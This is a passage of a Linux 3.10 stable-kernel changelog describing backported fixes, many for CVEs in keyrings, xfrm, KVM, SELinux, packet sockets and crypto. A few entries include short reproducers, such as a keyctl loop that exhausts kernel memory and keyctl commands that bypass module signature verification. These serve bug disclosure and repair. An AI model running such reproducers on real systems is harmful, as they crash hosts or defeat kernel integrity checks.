if (wait_list_empty(l)) {
owner = l->owner & ~HAS_WAITERS;
cmpxchg(l->owner, T1, NULL)
===> Success (l->owner = NULL)
l->owner = owner
==> l->owner = T1
}
That means the problem is caused by fixup_rt_mutex_waiters() which does the
RMW to clear the waiters bit unconditionally when there are no waiters in
the rtmutexes rbtree.
This can be fatal: A concurrent unlock can release the rtmutex in the
fastpath because the waiters bit is not set. If the cmpxchg() gets in the
middle of the RMW operation then the previous owner, which just unlocked
the rtmutex is set as the owner again when the write takes place after the
successfull cmpxchg().
The solution is rather trivial: verify that the owner member of the rtmutex
has the waiters bit set before clearing it. This does not require a
cmpxchg() or other atomic operations because the waiters bit can only be
set and cleared with the rtmutex wait_lock held. It's also safe against the
fast path unlock attempt. The unlock attempt via cmpxchg() will either see
the bit set and take the slowpath or see the bit cleared and release it
atomically in the fastpath.
It's remarkable that the test program provided by David triggers on ARM64
and MIPS64 really quick, but it refuses to reproduce on x86-64, while the
problem exists there as well. That refusal might explain that this got not
discovered earlier despite the bug existing from day one of the rtmutex
implementation more than 10 years ago.
Thanks to David for meticulously instrumenting the code and providing the
information which allowed to decode this subtle problem.
Reported-by: David Daney <ddaney@caviumnetworks.com>
Tested-by: David Daney <david.daney@cavium.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Steven Rostedt <rostedt@goodmis.org>
Acked-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Mark Rutland <mark.rutland@arm.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Sebastian Siewior <bigeasy@linutronix.de>
Cc: Will Deacon <will.deacon@arm.com>
Fixes:
23f78d4a03c5 ("[PATCH] pi-futex: rt mutex core")
Link: http://lkml.kernel.org/r/20161130210030.351136722@linutronix.de
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: s/{READ,WRITE}_ONCE/ACCESS_ONCE/]
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Kara [Sun, 24 Apr 2016 04:56:03 +0000 (00:56 -0400)]
ext4: fix data exposure after a crash
commit
06bd3c36a733ac27962fea7d6f47168841376824 upstream.
Huang has reported that in his powerfail testing he is seeing stale
block contents in some of recently allocated blocks although he mounts
ext4 in data=ordered mode. After some investigation I have found out
that indeed when delayed allocation is used, we don't add inode to
transaction's list of inodes needing flushing before commit. Originally
we were doing that but commit
f3b59291a69d removed the logic with a
flawed argument that it is not needed.
The problem is that although for delayed allocated blocks we write their
contents immediately after allocating them, there is no guarantee that
the IO scheduler or device doesn't reorder things and thus transaction
allocating blocks and attaching them to inode can reach stable storage
before actual block contents. Actually whenever we attach freshly
allocated blocks to inode using a written extent, we should add inode to
transaction's ordered inode list to make sure we properly wait for block
contents to be written before committing the transaction. So that is
what we do in this patch. This also handles other cases where stale data
exposure was possible - like filling hole via mmap in
data=ordered,nodelalloc mode.
The only exception to the above rule are extending direct IO writes where
blkdev_direct_IO() waits for IO to complete before increasing i_size and
thus stale data exposure is not possible. For now we don't complicate
the code with optimizing this special case since the overhead is pretty
low. In case this is observed to be a performance problem we can always
handle it using a special flag to ext4_map_blocks().
Fixes:
f3b59291a69d0b734be1fc8be489fef2dd846d3d
Reported-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
Tested-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Biggers [Tue, 18 Apr 2017 14:31:09 +0000 (15:31 +0100)]
KEYS: fix keyctl_set_reqkey_keyring() to not leak thread keyrings
commit
c9f838d104fed6f2f61d68164712e3204bf5271b upstream.
This fixes CVE-2017-7472.
Running the following program as an unprivileged user exhausts kernel
memory by leaking thread keyrings:
#include <keyutils.h>
int main()
{
for (;;)
keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
Fix it by only creating a new thread keyring if there wasn't one before.
To make things more consistent, make install_thread_keyring_to_cred()
and install_process_keyring_to_cred() both return 0 if the corresponding
keyring is already present.
Fixes:
d84f4f992cbd ("CRED: Inaugurate COW credentials")
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
David Howells [Tue, 18 Apr 2017 14:31:08 +0000 (15:31 +0100)]
KEYS: Change the name of the dead type to ".dead" to prevent user access
commit
c1644fe041ebaf6519f6809146a77c3ead9193af upstream.
This fixes CVE-2017-6951.
Userspace should not be able to do things with the "dead" key type as it
doesn't have some of the helper functions set upon it that the kernel
needs. Attempting to use it may cause the kernel to crash.
Fix this by changing the name of the type to ".dead" so that it's rejected
up front on userspace syscalls by key_get_type_from_user().
Though this doesn't seem to affect recent kernels, it does affect older
ones, certainly those prior to:
commit
c06cfb08b88dfbe13be44a69ae2fdc3a7c902d81
Author: David Howells <dhowells@redhat.com>
Date: Tue Sep 16 17:36:06 2014 +0100
KEYS: Remove key_type::match in favour of overriding default by match_preparse
which went in before 3.18-rc1.
Signed-off-by: David Howells <dhowells@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
David Howells [Tue, 18 Apr 2017 14:31:07 +0000 (15:31 +0100)]
KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings
commit
ee8f844e3c5a73b999edf733df1c529d6503ec2f upstream.
This fixes CVE-2016-9604.
Keyrings whose name begin with a '.' are special internal keyrings and so
userspace isn't allowed to create keyrings by this name to prevent
shadowing. However, the patch that added the guard didn't fix
KEYCTL_JOIN_SESSION_KEYRING. Not only can that create dot-named keyrings,
it can also subscribe to them as a session keyring if they grant SEARCH
permission to the user.
This, for example, allows a root process to set .builtin_trusted_keys as
its session keyring, at which point it has full access because now the
possessor permissions are added. This permits root to add extra public
keys, thereby bypassing module verification.
This also affects kexec and IMA.
This can be tested by (as root):
keyctl session .builtin_trusted_keys
keyctl add user a a @s
keyctl list @s
which on my test box gives me:
2 keys in keyring:
180010936: ---lswrv 0 0 asymmetric: Build time autogenerated kernel key:
ae3d4a31b82daa8e1a75b49dc2bba949fd992a05
801382539: --alswrv 0 0 user: a
Fix this by rejecting names beginning with a '.' in the keyctl.
Signed-off-by: David Howells <dhowells@redhat.com>
Acked-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
cc: linux-ima-devel@lists.sourceforge.net
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andy Whitcroft [Thu, 23 Mar 2017 07:45:44 +0000 (07:45 +0000)]
xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder
commit
f843ee6dd019bcece3e74e76ad9df0155655d0df upstream.
Kees Cook has pointed out that xfrm_replay_state_esn_len() is subject to
wrapping issues. To ensure we are correctly ensuring that the two ESN
structures are the same size compare both the overall size as reported
by xfrm_replay_state_esn_len() and the internal length are the same.
CVE-2017-7184
Signed-off-by: Andy Whitcroft <apw@canonical.com>
Acked-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andy Whitcroft [Wed, 22 Mar 2017 07:29:31 +0000 (07:29 +0000)]
xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window
commit
677e806da4d916052585301785d847c3b3e6186a upstream.
When a new xfrm state is created during an XFRM_MSG_NEWSA call we
validate the user supplied replay_esn to ensure that the size is valid
and to ensure that the replay_window size is within the allocated
buffer. However later it is possible to update this replay_esn via a
XFRM_MSG_NEWAE call. There we again validate the size of the supplied
buffer matches the existing state and if so inject the contents. We do
not at this point check that the replay_window is within the allocated
memory. This leads to out-of-bounds reads and writes triggered by
netlink packets. This leads to memory corruption and the potential for
priviledge escalation.
We already attempt to validate the incoming replay information in
xfrm_new_ae() via xfrm_replay_verify_len(). This confirms that the user
is not trying to change the size of the replay state buffer which
includes the replay_esn. It however does not check the replay_window
remains within that buffer. Add validation of the contained
replay_window.
CVE-2017-7184
Signed-off-by: Andy Whitcroft <apw@canonical.com>
Acked-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Fri, 3 Feb 2017 22:59:38 +0000 (14:59 -0800)]
tcp: avoid infinite loop in tcp_splice_read()
commit
ccf7abb93af09ad0868ae9033d1ca8108bdaec82 upstream.
Splicing from TCP socket is vulnerable when a packet with URG flag is
received and stored into receive queue.
__tcp_splice_read() returns 0, and sk_wait_data() immediately
returns since there is the problematic skb in queue.
This is a nice way to burn cpu (aka infinite loop) and trigger
soft lockups.
Again, this gem was found by syzkaller tool.
Fixes:
9c55e01c0cc8 ("[TCP]: Splice receive support.")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Willy Tarreau <w@1wt.eu>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Stephen Smalley [Tue, 31 Jan 2017 16:54:04 +0000 (11:54 -0500)]
selinux: fix off-by-one in setprocattr
commit
0c461cb727d146c9ef2d3e86214f498b78b7d125 upstream.
SELinux tries to support setting/clearing of /proc/pid/attr attributes
from the shell by ignoring terminating newlines and treating an
attribute value that begins with a NUL or newline as an attempt to
clear the attribute. However, the test for clearing attributes has
always been wrong; it has an off-by-one error, and this could further
lead to reading past the end of the allocated buffer since commit
bb646cdb12e75d82258c2f2e7746d5952d3e321a ("proc_pid_attr_write():
switch to memdup_user()"). Fix the off-by-one error.
Even with this fix, setting and clearing /proc/pid/attr attributes
from the shell is not straightforward since the interface does not
support multiple write() calls (so shells that write the value and
newline separately will set and then immediately clear the attribute,
requiring use of echo -n to set the attribute), whereas trying to use
echo -n "" to clear the attribute causes the shell to skip the
write() call altogether since POSIX says that a zero-length write
causes no side effects. Thus, one must use echo -n to set and echo
without -n to clear, as in the following example:
$ echo -n unconfined_u:object_r:user_home_t:s0 > /proc/$$/attr/fscreate
$ cat /proc/$$/attr/fscreate
unconfined_u:object_r:user_home_t:s0
$ echo "" > /proc/$$/attr/fscreate
$ cat /proc/$$/attr/fscreate
Note the use of /proc/$$ rather than /proc/self, as otherwise
the cat command will read its own attribute value, not that of the shell.
There are no users of this facility to my knowledge; possibly we
should just get rid of it.
UPDATE: Upon further investigation it appears that a local process
with the process:setfscreate permission can cause a kernel panic as a
result of this bug. This patch fixes CVE-2017-2618.
Signed-off-by: Stephen Smalley <sds@tycho.nsa.gov>
[PM: added the update about CVE-2017-2618 to the commit description]
Signed-off-by: Paul Moore <paul@paul-moore.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Kees Cook [Tue, 24 Jan 2017 23:18:24 +0000 (15:18 -0800)]
fbdev: color map copying bounds checking
commit
2dc705a9930b4806250fbf5a76e55266e59389f2 upstream.
Copying color maps to userspace doesn't check the value of to->start,
which will cause kernel heap buffer OOB read due to signedness wraps.
CVE-2016-8405
Link: http://lkml.kernel.org/r/20170105224249.GA50925@beast
Fixes:
1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Kees Cook <keescook@chromium.org>
Reported-by: Peter Pi (@heisecode) of Trend Micro
Cc: Min Chong <mchong@google.com>
Cc: Dan Carpenter <dan.carpenter@oracle.com>
Cc: Tomi Valkeinen <tomi.valkeinen@ti.com>
Cc: Bartlomiej Zolnierkiewicz <b.zolnierkie@samsung.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Gu Zheng [Mon, 9 Jan 2017 01:34:48 +0000 (09:34 +0800)]
tmpfs: clear S_ISGID when setting posix ACLs
commit
497de07d89c1410d76a15bec2bb41f24a2a89f31 upstream.
This change was missed the tmpfs modification in In CVE-2016-7097
commit
073931017b49 ("posix_acl: Clear SGID bit when setting
file permissions")
It can test by xfstest generic/375, which failed to clear
setgid bit in the following test case on tmpfs:
touch $testfile
chown 100:100 $testfile
chmod 2755 $testfile
_runas -u 100 -g 101 -- setfacl -m u::rwx,g::rwx,o::rwx $testfile
Signed-off-by: Gu Zheng <guzheng1@huawei.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Kara [Tue, 25 Oct 2016 13:44:26 +0000 (08:44 -0500)]
posix_acl: Clear SGID bit when setting file permissions
commit
073931017b49d9458aa351605b43a7e34598caef upstream.
When file permissions are modified via chmod(2) and the user is not in
the owning group or capable of CAP_FSETID, the setgid bit is cleared in
inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file
permissions as well as the new ACL, but doesn't clear the setgid bit in
a similar way; this allows to bypass the check in chmod(2). Fix that.
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
[wt: dropped hfsplus changes : no xattr in 3.10]
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steve Rutherford [Thu, 12 Jan 2017 02:28:29 +0000 (18:28 -0800)]
KVM: x86: Introduce segmented_write_std
commit
129a72a0d3c8e139a04512325384fe5ac119e74d upstream.
Introduces segemented_write_std.
Switches from emulated reads/writes to standard read/writes in fxsave,
fxrstor, sgdt, and sidt. This fixes CVE-2017-2584, a longstanding
kernel memory leak.
Since commit
283c95d0e389 ("KVM: x86: emulate FXSAVE and FXRSTOR",
2016-11-09), which is luckily not yet in any final release, this would
also be an exploitable kernel memory *write*!
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes:
96051572c819194c37a8367624b285be10297eca
Fixes:
283c95d0e3891b64087706b344a4b545d04a6e62
Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Steve Rutherford <srutherford@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Paolo Bonzini [Thu, 12 Jan 2017 14:02:32 +0000 (15:02 +0100)]
KVM: x86: fix emulation of "MOV SS, null selector"
commit
33ab91103b3415e12457e3104f0e4517ce12d0f3 upstream.
This is CVE-2017-2583. On Intel this causes a failed vmentry because
SS's type is neither 3 nor 7 (even though the manual says this check is
only done for usable SS, and the dmesg splat says that SS is unusable!).
On AMD it's worse: svm.c is confused and sets CPL to 0 in the vmcb.
The fix fabricates a data segment descriptor when SS is set to a null
selector, so that CPL and SS.DPL are set correctly in the VMCS/vmcb.
Furthermore, only allow setting SS to a NULL selector if SS.RPL < 3;
this in turn ensures CPL < 3 because RPL must be equal to CPL.
Thanks to Andy Lutomirski and Willy Tarreau for help in analyzing
the bug and deciphering the manuals.
[js] backport to 3.12
Reported-by: Xiaohan Zhang <zhangxiaohan1@huawei.com>
Fixes:
79d5b4c3cd809c770d4bf9812635647016c56011
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Ilya Dryomov [Wed, 1 Mar 2017 16:33:27 +0000 (17:33 +0100)]
libceph: don't set weight to IN when OSD is destroyed
commit
b581a5854eee4b7851dedb0f8c2ceb54fb902c06 upstream.
Since ceph.git commit
4e28f9e63644 ("osd/OSDMap: clear osd_info,
osd_xinfo on osd deletion"), weight is set to IN when OSD is deleted.
This changes the result of applying an incremental for clients, not
just OSDs. Because CRUSH computations are obviously affected,
pre-
4e28f9e63644 servers disagree with post-
4e28f9e63644 clients on
object placement, resulting in misdirected requests.
Mirrors ceph.git commit
a6009d1039a55e2c77f431662b3d6cc5a8e8e63f.
Fixes:
930c53286977 ("libceph: apply new_state before new_up_client on incrementals")
Link: http://tracker.ceph.com/issues/19122
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Reviewed-by: Sage Weil <sage@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Ryan Ware [Thu, 11 Feb 2016 23:58:44 +0000 (15:58 -0800)]
EVM: Use crypto_memneq() for digest comparisons
commit
613317bd212c585c20796c10afe5daaa95d4b0a1 upstream.
This patch fixes vulnerability CVE-2016-2085. The problem exists
because the vm_verify_hmac() function includes a use of memcmp().
Unfortunately, this allows timing side channel attacks; specifically
a MAC forgery complexity drop from 2^128 to 2^12. This patch changes
the memcmp() to the cryptographically safe crypto_memneq().
Reported-by: Xiaofei Rex Guo <xiaofei.rex.guo@intel.com>
Signed-off-by: Ryan Ware <ware@linux.intel.com>
Cc: stable@vger.kernel.org
Signed-off-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Cc: Jason A. Donenfeld <Jason@zx2c4.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
James Yonan [Thu, 26 Sep 2013 08:20:39 +0000 (02:20 -0600)]
crypto: crypto_memneq - add equality testing of memory regions w/o timing leaks
commit
6bf37e5aa90f18baf5acf4874bca505dd667c37f upstream.
When comparing MAC hashes, AEAD authentication tags, or other hash
values in the context of authentication or integrity checking, it
is important not to leak timing information to a potential attacker,
i.e. when communication happens over a network.
Bytewise memory comparisons (such as memcmp) are usually optimized so
that they return a nonzero value as soon as a mismatch is found. E.g,
on x86_64/i5 for 512 bytes this can be ~50 cyc for a full mismatch
and up to ~850 cyc for a full match (cold). This early-return behavior
can leak timing information as a side channel, allowing an attacker to
iteratively guess the correct result.
This patch adds a new method crypto_memneq ("memory not equal to each
other") to the crypto API that compares memory areas of the same length
in roughly "constant time" (cache misses could change the timing, but
since they don't reveal information about the content of the strings
being compared, they are effectively benign). Iow, best and worst case
behaviour take the same amount of time to complete (in contrast to
memcmp).
Note that crypto_memneq (unlike memcmp) can only be used to test for
equality or inequality, NOT for lexicographical order. This, however,
is not an issue for its use-cases within the crypto API.
We tried to locate all of the places in the crypto API where memcmp was
being used for authentication or integrity checking, and convert them
over to crypto_memneq.
crypto_memneq is declared noinline, placed in its own source file,
and compiled with optimizations that might increase code size disabled
("Os") because a smart compiler (or LTO) might notice that the return
value is always compared against zero/nonzero, and might then
reintroduce the same early-return optimization that we are trying to
avoid.
Using #pragma or __attribute__ optimization annotations of the code
for disabling optimization was avoided as it seems to be considered
broken or unmaintained for long time in GCC [1]. Therefore, we work
around that by specifying the compile flag for memneq.o directly in
the Makefile. We found that this seems to be most appropriate.
As we use ("Os"), this patch also provides a loop-free "fast-path" for
frequently used 16 byte digests. Similarly to kernel library string
functions, leave an option for future even further optimized architecture
specific assembler implementations.
This was a joint work of James Yonan and Daniel Borkmann. Also thanks
for feedback from Florian Weimer on this and earlier proposals [2].
[1] http://gcc.gnu.org/ml/gcc/2012-07/msg00211.html
[2] https://lkml.org/lkml/2013/2/10/131
Signed-off-by: James Yonan <james@openvpn.net>
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Cc: Florian Weimer <fw@deneb.enyo.de>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Cc: Jason A. Donenfeld <Jason@zx2c4.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Philip Pettersson [Wed, 30 Nov 2016 22:55:36 +0000 (14:55 -0800)]
packet: fix race condition in packet_set_ring
commit
84ac7260236a49c79eede91617700174c2c19b0c upstream.
When packet_set_ring creates a ring buffer it will initialize a
struct timer_list if the packet version is TPACKET_V3. This value
can then be raced by a different thread calling setsockopt to
set the version to TPACKET_V1 before packet_set_ring has finished.
This leads to a use-after-free on a function pointer in the
struct timer_list when the socket is closed as the previously
initialized timer will not be deleted.
The bug is fixed by taking lock_sock(sk) in packet_setsockopt when
changing the packet version while also taking the lock at the start
of packet_set_ring.
Fixes:
f6fb8f100b80 ("af-packet: TPACKET_V3 flexible buffer implementation.")
Signed-off-by: Philip Pettersson <philip.pettersson@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: gregkh@linuxfoundation.org
Signed-off-by: Willy Tarreau <w@1wt.eu>
Willy Tarreau [Fri, 10 Feb 2017 10:14:46 +0000 (11:14 +0100)]
Linux 3.10.105
Guenter Roeck [Fri, 7 Oct 2016 17:40:59 +0000 (10:40 -0700)]
metag: Only define atomic_dec_if_positive conditionally
commit
35d04077ad96ed33ceea2501f5a4f1eacda77218 upstream.
The definition of atomic_dec_if_positive() assumes that
atomic_sub_if_positive() exists, which is only the case if
metag specific atomics are used. This results in the following
build error when trying to build metag1_defconfig.
kernel/ucount.c: In function 'dec_ucount':
kernel/ucount.c:211: error:
implicit declaration of function 'atomic_sub_if_positive'
Moving the definition of atomic_dec_if_positive() into the metag
conditional code fixes the problem.
Fixes:
6006c0d8ce94 ("metag: Atomics, locks and bitops")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Max Staudt [Mon, 13 Jun 2016 17:15:59 +0000 (19:15 +0200)]
fbdev/efifb: Fix 16 color palette entry calculation
commit
d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream.
When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).
The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.
With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").
Fixes:
7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+
Signed-off-by: Max Staudt <mstaudt@suse.de>
Acked-By: Peter Jones <pjones@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Bart Van Assche [Wed, 31 Aug 2016 22:17:49 +0000 (15:17 -0700)]
dm: mark request_queue dead before destroying the DM device
commit
3b785fbcf81c3533772c52b717f77293099498d3 upstream.
This avoids that new requests are queued while __dm_destroy() is in
progress.
[js] use md->queue instead of non-present helper
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Remmet [Fri, 23 Sep 2016 08:52:00 +0000 (10:52 +0200)]
regulator: tps65910: Work around silicon erratum SWCZ010
commit
8f9165c981fed187bb483de84caf9adf835aefda upstream.
http://www.ti.com/lit/pdf/SWCZ010:
DCDC o/p voltage can go higher than programmed value
Impact:
VDDI, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.
Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFETis synchronized or at a constant
phase shift
* Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
possible switching noise on the application. This noise level depends
on the layout, the VBAT level, and the load current. The noise level
increases with improper layout.
When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
causing lower overall switching noise.
Workaround:
Set DCDCCTRL_REG[1:0]= 00.
Signed-off-by: Jan Remmet <j.remmet@phytec.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Peter Ujfalusi [Tue, 23 Aug 2016 07:27:19 +0000 (10:27 +0300)]
ASoC: omap-mcpdm: Fix irq resource handling
commit
a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream.
Fixes:
ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function")
Managed irq request will not doing any good in ASoC probe level as it is
not going to free up the irq when the driver is unbound from the sound
card.
Signed-off-by: Peter Ujfalusi <peter.ujfalusi@ti.com>
Reported-by: Russell King <linux@armlinux.org.uk>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Dan Carpenter [Thu, 4 Aug 2016 05:26:56 +0000 (08:26 +0300)]
mfd: 88pm80x: Double shifting bug in suspend/resume
commit
9a6dc644512fd083400a96ac4a035ac154fe6b8d upstream.
set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug. It's done
consistently so it won't cause a problem unless "irq" is more than 4.
Fixes:
70c6cce04066 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andrey Ryabinin [Thu, 24 Nov 2016 13:23:10 +0000 (13:23 +0000)]
mpi: Fix NULL ptr dereference in mpi_powm() [ver #3]
commit
f5527fffff3f002b0a6b376163613b82f69de073 upstream.
This fixes CVE-2016-8650.
If mpi_powm() is given a zero exponent, it wants to immediately return
either 1 or 0, depending on the modulus. However, if the result was
initalised with zero limb space, no limbs space is allocated and a
NULL-pointer exception ensues.
Fix this by allocating a minimal amount of limb space for the result when
the 0-exponent case when the result is 1 and not touching the limb space
when the result is 0.
This affects the use of RSA keys and X.509 certificates that carry them.
BUG: unable to handle kernel NULL pointer dereference at (null)
IP: [<
ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
PGD 0
Oops: 0002 [#1] SMP
Modules linked in:
CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278
Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014
task:
ffff8804011944c0 task.stack:
ffff880401294000
RIP: 0010:[<
ffffffff8138ce5d>] [<
ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
RSP: 0018:
ffff880401297ad8 EFLAGS:
00010212
RAX:
0000000000000000 RBX:
ffff88040868bec0 RCX:
ffff88040868bba0
RDX:
ffff88040868b260 RSI:
ffff88040868bec0 RDI:
ffff88040868bee0
RBP:
ffff880401297ba8 R08:
0000000000000000 R09:
0000000000000000
R10:
0000000000000047 R11:
ffffffff8183b210 R12:
0000000000000000
R13:
ffff8804087c7600 R14:
000000000000001f R15:
ffff880401297c50
FS:
00007f7a7918c700(0000) GS:
ffff88041fb80000(0000) knlGS:
0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0:
0000000080050033
CR2:
0000000000000000 CR3:
0000000401250000 CR4:
00000000001406e0
Stack:
ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4
0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30
ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8
Call Trace:
[<
ffffffff81376cd4>] ? __sg_page_iter_next+0x43/0x66
[<
ffffffff81376d12>] ? sg_miter_get_next_page+0x1b/0x5d
[<
ffffffff81376f37>] ? sg_miter_next+0x17/0xbd
[<
ffffffff8138ba3a>] ? mpi_read_raw_from_sgl+0xf2/0x146
[<
ffffffff8132a95c>] rsa_verify+0x9d/0xee
[<
ffffffff8132acca>] ? pkcs1pad_sg_set_buf+0x2e/0xbb
[<
ffffffff8132af40>] pkcs1pad_verify+0xc0/0xe1
[<
ffffffff8133cb5e>] public_key_verify_signature+0x1b0/0x228
[<
ffffffff8133d974>] x509_check_for_self_signed+0xa1/0xc4
[<
ffffffff8133cdde>] x509_cert_parse+0x167/0x1a1
[<
ffffffff8133d609>] x509_key_preparse+0x21/0x1a1
[<
ffffffff8133c3d7>] asymmetric_key_preparse+0x34/0x61
[<
ffffffff812fc9f3>] key_create_or_update+0x145/0x399
[<
ffffffff812fe227>] SyS_add_key+0x154/0x19e
[<
ffffffff81001c2b>] do_syscall_64+0x80/0x191
[<
ffffffff816825e4>] entry_SYSCALL64_slow_path+0x25/0x25
Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f
RIP [<
ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
RSP <
ffff880401297ad8>
CR2:
0000000000000000
---[ end trace
d82015255d4a5d8d ]---
Basically, this is a backport of a libgcrypt patch:
http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=
6e1adb05d290aeeb1c230c763970695f4a538526
Fixes:
cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)")
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Dmitry Kasatkin <dmitry.kasatkin@gmail.com>
cc: linux-ima-devel@lists.sourceforge.net
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Michael Walle [Tue, 19 Jul 2016 14:43:26 +0000 (16:43 +0200)]
